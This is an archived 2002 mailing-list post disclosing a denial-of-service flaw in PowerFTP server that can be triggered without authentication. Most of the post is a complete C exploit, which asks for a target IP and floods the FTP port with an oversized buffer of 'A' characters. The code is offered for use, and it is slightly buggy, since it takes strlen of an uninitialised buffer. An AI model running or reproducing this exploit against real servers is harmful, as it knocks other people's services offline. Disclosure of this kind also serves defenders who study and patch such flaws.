Vulnerabilitie in PowerFTP server

From: Armand Morgan (morgan53at_private)
Date: Sat Oct 05 2002 - 05:27:44 PDT

  • Next message: Mike Shaw: "Re: Kill a Unisys Clearpath with nmap port scan"

    
     ('binary' encoding is not supported, stored as-is)
    I've found a DoS vulnerability in PowerFTP. He doesn't need an account on 
    the server. Just send many information at the variable USER. You could 
    see the xploit :
    
    /* Remote DoS Exploit for PowerFTP server (all version) */
    /* Coding by Morgan A. member of secureNT-2000 Greetz : */
    /* kdm, Yann, GaLiaRepT, and all i've forgotten ;)      */
    
    #include <stdio.h>
    #include <winsock.h>
    	#pragma comment(lib, "wsock32.lib")
    
    void main()
    	{
            WSADATA WSAData;
    		WSAStartup(MAKEWORD(2,0), &WSAData);
    	
    		SOCKET sock;
    		SOCKADDR_IN sin;
    		char *buffer = new char[255];
    
            char ip[50];
            printf ("Remote DoS Exploit for PowerFTP server\n\n");
            printf ("Remote IP: ");
            scanf ("%s", &ip);
    
            char DoS[3000];
            int i;
            for(i=0;i<strlen(DoS);i++)
            {
            DoS[i]= 'A';
            }
    
            sock = socket(AF_INET, SOCK_STREAM, 0);
    	
    		sin.sin_addr.s_addr			= inet_addr(ip);
    		sin.sin_family				= AF_INET;
    		sin.sin_port				= htons(21);
    
    		connect(sock, (SOCKADDR *)&sin, sizeof(sin));
    		send(sock, DoS, sizeof(DoS), 0);
    		closesocket(sock);
    		WSACleanup();
    	}
    



    This archive was generated by hypermail 2b30 : Sat Oct 05 2002 - 10:23:47 PDT